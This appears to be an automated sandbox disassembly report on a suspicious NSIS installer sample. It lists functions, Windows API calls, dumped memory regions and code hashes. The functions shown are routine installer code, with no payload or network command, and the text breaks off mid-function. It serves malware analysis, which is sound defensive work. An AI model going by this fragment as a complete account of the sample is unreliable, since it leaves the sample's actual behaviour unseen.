                                        • Opcode ID: 308fadea3a0b968ed56b92214e6bc0f27c5543f8f515069d12591bb602a569a4
                                        • Instruction ID: 935e679f1c1c714b0e3911a5d698b339edd04cd04073ee9c7d5fe0644536c501
                                        • Opcode Fuzzy Hash: 308fadea3a0b968ed56b92214e6bc0f27c5543f8f515069d12591bb602a569a4
                                        • Instruction Fuzzy Hash: FCF02831105E511AE62233352C0DAAF1A44CE93364719857FF855B12D2DB3C89479D7D
                                        Function 00405C1F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004033C5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 00405C25
                                        • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004033C5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 00405C2E
                                        • lstrcatA.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C), ref: 00405C3F
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C1F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: CharPrevlstrcatlstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 2659869361-3081826266
                                        • Opcode ID: 1585f28ce29590c56c09183d2983d03a0d8d28acc38857c1cbd7e9952efaabbf
                                        • Instruction ID: 5ecf558490c9fc18ca768c1c77fe203d25deaeb0153a8833875816b6af26cf17
                                        • Opcode Fuzzy Hash: 1585f28ce29590c56c09183d2983d03a0d8d28acc38857c1cbd7e9952efaabbf
                                        • Instruction Fuzzy Hash: 98D0A772505A306BE50136565D09ECB1A088F4231570500AFF140B2191C67C0C5147FD
                                        Function 00405CB8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                        Download Yara Rule
                                        APIs
                                        • CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,0000000C,00405D24,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,74DF3410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe"), ref: 00405CC6
                                        • CharNextA.USER32(00000000), ref: 00405CCB
                                        • CharNextA.USER32(00000000), ref: 00405CDF
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\nsb535E.tmp, xrefs: 00405CB9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: CharNext
                                        • String ID: C:\Users\user\AppData\Local\Temp\nsb535E.tmp
                                        • API String ID: 3213498283-3133259053
                                        • Opcode ID: 48ab597918d8e2ef306ddd6e117c28a3ba6feb84c3778f0c5ad980b6008cf2cb
                                        • Instruction ID: ee8b6173ba6a0b3c7a77adf62d8f17896d3fbd5398f7dd7aaac8169870cad506
                                        • Opcode Fuzzy Hash: 48ab597918d8e2ef306ddd6e117c28a3ba6feb84c3778f0c5ad980b6008cf2cb
                                        • Instruction Fuzzy Hash: 42F02B51908FA02BFB3252246C48B775B8CDF95715F048477D5407B2C2C27C6C414F9A
                                        Function 00402ECD Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                        Download Yara Rule
                                        APIs
                                        • DestroyWindow.USER32(00000000,00000000,004030AB,00000001,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00402EE0
                                        • GetTickCount.KERNEL32 ref: 00402EFE
                                        • CreateDialogParamA.USER32(0000006F,00000000,00402E4A,00000000), ref: 00402F1B
                                        • ShowWindow.USER32(00000000,00000005,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00402F29
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                        • String ID:
                                        • API String ID: 2102729457-0
                                        • Opcode ID: 82cc071085b0e421d38bebfb76feb0ba11fa504106e74bc84e10844e5b096cab
                                        • Instruction ID: 55e8d60830c64a568362c8f460213b41695a60035779f7009bf19f5ad348a086
                                        • Opcode Fuzzy Hash: 82cc071085b0e421d38bebfb76feb0ba11fa504106e74bc84e10844e5b096cab
                                        • Instruction Fuzzy Hash: B7F03A30A45621EBC771AB50FE0CA9B7B64FB05B59B41043AF001F11A9CB745852DBED
                                        Function 00405345 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • IsWindowVisible.USER32(?), ref: 00405374
                                        • CallWindowProcA.USER32(?,?,?,?), ref: 004053C5
                                          • Part of subcall function 00404379: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 0040438B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Window$CallMessageProcSendVisible
                                        • String ID:
                                        • API String ID: 3748168415-3916222277
                                        • Opcode ID: b9d322c03724d0f4ccaad077e5ef09c26c8614d3de5af0662f84842769c694b6
                                        • Instruction ID: 98c6722e6a54b641667f931c9e29074c60bd52ab0debc5010bc9b6450a54dc72
                                        • Opcode Fuzzy Hash: b9d322c03724d0f4ccaad077e5ef09c26c8614d3de5af0662f84842769c694b6
                                        • Instruction Fuzzy Hash: 9201B171100608AFFF205F11ED84A6B3A26EB84794F50413BFE407A1D1C3B98C629E5E
                                        Function 00403A01 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                        Download Yara Rule
                                        APIs
                                        • FreeLibrary.KERNEL32(?,74DF3410,00000000,C:\Users\user\AppData\Local\Temp\,004039D9,004037BF,?,?,00000008,0000000A,0000000C), ref: 00403A1B
                                        • GlobalFree.KERNEL32(00650E50), ref: 00403A22
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A01
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Free$GlobalLibrary
                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 1100898210-3081826266
                                        • Opcode ID: 0079c2f67775dda8b537f62a0fedec5a832efd40d4ebab5497539fb8ea7bc8ed
                                        • Instruction ID: 5c739cdb98e40ae8c0dfefb52ad11f1475293c83533685fd3a033b9eca192303
                                        • Opcode Fuzzy Hash: 0079c2f67775dda8b537f62a0fedec5a832efd40d4ebab5497539fb8ea7bc8ed
                                        • Instruction Fuzzy Hash: 16E01D3361513057CA315F45FD0579A77685F58B27F09403AE8807715587745D434FD9
                                        Function 00405C66 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F9D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe,C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe,80000000,00000003,?,?,00403722,?,?,00000008,0000000A), ref: 00405C6C
                                        • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F9D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe,C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe,80000000,00000003,?,?,00403722,?), ref: 00405C7A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: CharPrevlstrlen
                                        • String ID: C:\Users\user\Desktop
                                        • API String ID: 2709904686-224404859
                                        • Opcode ID: 636972430895b8d26769eef308ecf034eeaaaa2c94ab7ae9d1342fa23427dc1b
                                        • Instruction ID: c418d430c32a25fd64e5672735cb35cda0f462e3a1cf334074a775347c04a98e
                                        • Opcode Fuzzy Hash: 636972430895b8d26769eef308ecf034eeaaaa2c94ab7ae9d1342fa23427dc1b
                                        • Instruction Fuzzy Hash: 62D0A7B240CEB02FF70362108D00B9F6A48CF13704F0904A7E080E2190C27C0C4147AD
                                        Function 6E3310E0 Relevance: 5.1, APIs: 4, Instructions: 144memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 6E33116B
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 6E3311D8
                                        • GlobalFree.KERNEL32(?), ref: 6E331286
                                        • GlobalFree.KERNEL32(00000000), ref: 6E33129B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2088083079.000000006E331000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E330000, based on PE: true
                                        • Associated: 00000000.00000002.2088011783.000000006E330000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000000.00000002.2088098769.000000006E334000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000000.00000002.2088118015.000000006E336000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e330000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Global$AllocFree
                                        • String ID:
                                        • API String ID: 3394109436-0
                                        • Opcode ID: 96804a68ab7b606e1cc766becd0dbf76ab957d25a63c1594b195ef5ec7f7f3bc
                                        • Instruction ID: 829e46c0e4dd5f540835adb108ed15d24122e0b0d6f6a005ffabd9c97bb7f8e1
                                        • Opcode Fuzzy Hash: 96804a68ab7b606e1cc766becd0dbf76ab957d25a63c1594b195ef5ec7f7f3bc
                                        • Instruction Fuzzy Hash: CE51C1B19046E6AFDB60CFA8C994EA6BBFCFB0A344F240495F585C7210D736D818CB91
                                        Function 00405D85 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D95
                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405DAD
                                        • CharNextA.USER32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DBE
                                        • lstrlenA.KERNEL32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DC7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: lstrlen$CharNextlstrcmpi
                                        • String ID:
                                        • API String ID: 190613189-0
                                        • Opcode ID: 4f1eaa0065bfc49b54b56e64601aea382fadfb9647de4ff4bb676f0ffe3a7a9e
                                        • Instruction ID: 0b01db06aa3b468373a9359c006e34c779135354681a34c4aba1de8cdbfa9028
                                        • Opcode Fuzzy Hash: 4f1eaa0065bfc49b54b56e64601aea382fadfb9647de4ff4bb676f0ffe3a7a9e
                                        • Instruction Fuzzy Hash: 86F0C231100418AFC7029BA5CE0499EBBA8EF06250B2180AAE840F7211D674DE01AB6C

                                        Non-executed Functions

                                        Function 004033D8 Relevance: 77.4, APIs: 32, Strings: 12, Instructions: 430stringfilecomCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetErrorMode.KERNEL32(00008001), ref: 004033FB
                                        • GetVersionExA.KERNEL32(?), ref: 00403424
                                        • GetVersionExA.KERNEL32(0000009C), ref: 0040343B
                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403504
                                        • #17.COMCTL32(?,00000008,0000000A,0000000C), ref: 00403541
                                        • OleInitialize.OLE32(00000000), ref: 00403548
                                        • SHGetFileInfoA.SHELL32(00429448,00000000,?,00000160,00000000,?,00000008,0000000A,0000000C), ref: 00403566
                                        • GetCommandLineA.KERNEL32(0042E820,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040357B
                                        • CharNextA.USER32(00000000,00435000,00000020,00435000,00000000,?,00000008,0000000A,0000000C), ref: 004035B5
                                        • GetTempPathA.KERNEL32(00000400,00436400,00000000,00000020,?,00000008,0000000A,0000000C), ref: 004036AE
                                        • GetWindowsDirectoryA.KERNEL32(00436400,000003FB,?,00000008,0000000A,0000000C), ref: 004036BF
                                        • lstrcatA.KERNEL32(00436400,\Temp,?,00000008,0000000A,0000000C), ref: 004036CB
                                        • GetTempPathA.KERNEL32(000003FC,00436400,00436400,\Temp,?,00000008,0000000A,0000000C), ref: 004036DF
                                        • lstrcatA.KERNEL32(00436400,Low,?,00000008,0000000A,0000000C), ref: 004036E7
                                        • SetEnvironmentVariableA.KERNEL32(TEMP,00436400,00436400,Low,?,00000008,0000000A,0000000C), ref: 004036F8
                                        • SetEnvironmentVariableA.KERNEL32(TMP,00436400,?,00000008,0000000A,0000000C), ref: 00403700
                                        • DeleteFileA.KERNEL32(00436000,?,00000008,0000000A,0000000C), ref: 00403714
                                        • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C), ref: 004037BF
                                        • ExitProcess.KERNEL32 ref: 004037E0
                                        • lstrlenA.KERNEL32(00436400,00435000,00000000,?,?,00000008,0000000A,0000000C), ref: 004037EF
                                        • wsprintfA.USER32 ref: 00403846
                                        • GetFileAttributesA.KERNEL32(00431400,00436400,00431400,?,0000000C), ref: 00403878
                                        • DeleteFileA.KERNEL32(00431400), ref: 00403884
                                        • SetCurrentDirectoryA.KERNEL32(00436400,00436400,00431400,?,0000000C), ref: 004038B0
                                        • CopyFileA.KERNEL32(00436C00,00431400,00000001), ref: 004038C6
                                        • CloseHandle.KERNEL32(00000000,00431800,00431800,?,00431400,00000000), ref: 00403919
                                        • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C), ref: 00403936
                                        • OpenProcessToken.ADVAPI32(00000000), ref: 0040393D
                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403951
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403970
                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 00403995
                                        • ExitProcess.KERNEL32 ref: 004039B6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: File$Process$Exit$CurrentDeleteDirectoryEnvironmentPathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCloseCommandCopyErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuewsprintf
                                        • String ID: "$A$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`Kt$~nsu%X.tmp
                                        • API String ID: 2956269667-914819399
                                        • Opcode ID: e13c508dadc9a019ad899f483bcab1bf5121664e56d1959915504f3b46ceb96e
                                        • Instruction ID: 7f7404e7af7d96985e5cf9c88e74da5f08b6bc5144b1890d42f960bb7a69135c
                                        • Opcode Fuzzy Hash: e13c508dadc9a019ad899f483bcab1bf5121664e56d1959915504f3b46ceb96e
                                        • Instruction Fuzzy Hash: E2F11570904254AADB21AF758D49BAF7EB8AF45706F0440BFF441B62D2CB7C4A45CB2E
                                        Function 00405A4F Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 159filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • DeleteFileA.KERNEL32(?,?,74DF3410,00436400,00435000), ref: 00405A78
                                        • lstrcatA.KERNEL32(0042B490,\*.*,0042B490,?,?,74DF3410,00436400,00435000), ref: 00405AC0
                                        • lstrcatA.KERNEL32(?,0040A014,?,0042B490,?,?,74DF3410,00436400,00435000), ref: 00405AE1
                                        • lstrlenA.KERNEL32(?,?,0040A014,?,0042B490,?,?,74DF3410,00436400,00435000), ref: 00405AE7
                                        • FindFirstFileA.KERNEL32(0042B490,?,?,?,0040A014,?,0042B490,?,?,74DF3410,00436400,00435000), ref: 00405AF8
                                        • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405BA5
                                        • FindClose.KERNEL32(00000000), ref: 00405BB6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                        • String ID: \*.*
                                        • API String ID: 2035342205-1173974218
                                        • Opcode ID: fd14e2a26b3c5305760fc07f32de27d450e580bd3a69afa393f06f0700e9f7c9
                                        • Instruction ID: da8d20c05f1c1589987c6f576fa29bd8846dab181693994c0c241c39a5f8a394
                                        • Opcode Fuzzy Hash: fd14e2a26b3c5305760fc07f32de27d450e580bd3a69afa393f06f0700e9f7c9
                                        • Instruction Fuzzy Hash: 3051C030904A04BADB21AB618C85FAF7AB8EF42754F14417FF445B11D2C77C6982DEAE
                                        Function 00404D32 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 491windowmemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,000003F9), ref: 00404D49
                                        • GetDlgItem.USER32(?,00000408), ref: 00404D56
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404DA5
                                        • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404DBC
                                        • SetWindowLongA.USER32(?,000000FC,00405345), ref: 00404DD6
                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404DE8
                                        • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404DFC
                                        • SendMessageA.USER32(?,00001109,00000002), ref: 00404E12
                                        • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404E1E
                                        • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404E2E
                                        • DeleteObject.GDI32(00000110), ref: 00404E33
                                        • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404E5E
                                        • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404E6A
                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404F04
                                        • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404F34
                                          • Part of subcall function 00404362: SendMessageA.USER32(00000028,?,00000001,00404192), ref: 00404370
                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404F48
                                        • GetWindowLongA.USER32(?,000000F0), ref: 00404F76
                                        • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404F84
                                        • ShowWindow.USER32(?,00000005), ref: 00404F94
                                        • SendMessageA.USER32(?,00000419,00000000,?), ref: 0040508F
                                        • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 004050F4
                                        • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00405109
                                        • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 0040512D
                                        • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 0040514D
                                        • ImageList_Destroy.COMCTL32(?), ref: 00405162
                                        • GlobalFree.KERNEL32(?), ref: 00405172
                                        • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 004051EB
                                        • SendMessageA.USER32(?,00001102,?,?), ref: 00405294
                                        • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004052A3
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 004052CE
                                        • ShowWindow.USER32(?,00000000), ref: 0040531C
                                        • GetDlgItem.USER32(?,000003FE), ref: 00405327
                                        • ShowWindow.USER32(00000000), ref: 0040532E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                        • String ID: $M$N
                                        • API String ID: 2564846305-813528018
                                        • Opcode ID: f11250b3fb3f61882aa354a54652fc5f201eb5c666114b29f2145b9c808ef288
                                        • Instruction ID: b1cb089e499fd84ad02b8b6dcb50706d58213328e80d7969948961eab3192630
                                        • Opcode Fuzzy Hash: f11250b3fb3f61882aa354a54652fc5f201eb5c666114b29f2145b9c808ef288
                                        • Instruction Fuzzy Hash: B1027DB0A00609AFDF209F94DD45AAE7BB5FB44354F50817AFA10BA2E1C7789D42CF58
                                        Function 0040550F Relevance: 54.3, APIs: 36, Instructions: 282windowclipboardmemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,00000403), ref: 0040556E
                                        • GetDlgItem.USER32(?,000003EE), ref: 0040557D
                                        • GetClientRect.USER32(?,?), ref: 004055BA
                                        • GetSystemMetrics.USER32(00000002), ref: 004055C1
